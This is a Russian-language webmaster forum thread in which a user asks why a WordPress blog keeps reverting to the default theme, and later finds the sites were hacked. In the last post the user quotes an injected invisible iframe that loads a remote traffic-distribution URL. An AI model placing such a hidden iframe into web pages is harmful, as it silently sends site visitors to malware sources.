Проблемы с wp

novitskiias
На сайте с 17.05.2010
Offline
34
539

вопросик из ряда необъяснимое )

создал очередной блог на вп всё красиво работает индексируется, но в один прекрасный момент захожу проверить блог,а там стоит стандартный шаблон и надпись нет записей !

зашол в админу посмотрел все на месте шаблон стоит мой и все посты есть,а блог не отображает, после чего добавил новый пост и все опять заработало на блоге отобразился мой шаблон и все записи )

теперь такая фигня повторяется постоянно что делать

Каждый вебмастер - программист, но не каждый программист - вебмастер a42341
Shapranov Pavel
На сайте с 27.08.2007
Offline
304
#1

Действительно необъяснимое на ночь глядя :)

Может быть эта проблема только для незарегистрированных пользователей? Потому что вы логинитесь и проблема исчезает. Переустановка кстати не помогает?

[Удален]
#2

По описанию похоже на то что отваливается часть таблиц в мускуле. Либо одна база заменяется другой. С таким не сталкивался у ВП. Если свой сервер возможно что то намудрили с настройками. Хотя даже не знаю что можно было намудрить :) . Разве что совсем фантастическое по крону редактировать wp-config.php, но это так из разряда фантастики. Скорее всего кто то у вас на сервере хозяйничает, причём глупо и не аккуратно.

Есть заметная периодичность? Может не все рассказали?

novitskiias
На сайте с 17.05.2010
Offline
34
#3
Переустановка кстати не помогает?

3 раза переустанавливал толку ноль

Скорее всего кто то у вас на сервере хозяйничает, причём глупо и не аккуратно.

ну это врят ли так как на хостинге еще 4 сайтика и сними всё нормально

Есть заметная периодичность?

приблизительно каждые 2 часика

Может не все рассказали?

на одном из сайтов давненько была такая проблема, но всё решилось переустановкой, а сейчас не пойму что )

inseonight
На сайте с 10.10.2008
Offline
144
#4

версия вп, список установленных плагинов, сколько выделяется памяти скриптам (phpinfo)

?

Занимаюсь разработкой и продвижением интернет магазинов. Внедряю аналитику и консультирую по seo.
novitskiias
На сайте с 17.05.2010
Offline
34
#5

ап

видимо сайты всё таки взломали, сегодня все сайты отключились при загрузке выдаются ошибки

wp-includes/l10n.php on line 521

wp-settings.php on line 143

там встроена не понятная ерунда это не мой точно )

<iframe src="http://megabanny.info/tds/in.cgi?5" width="9" height="10" style="visibility: hidden;"></iframe>

кто что знает подскажите, что делать-куда обратиться

inseonight
На сайте с 10.10.2008
Offline
144
#6

Могу вычистить эту заразу, велком в асю, будем договариваться о цене...

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий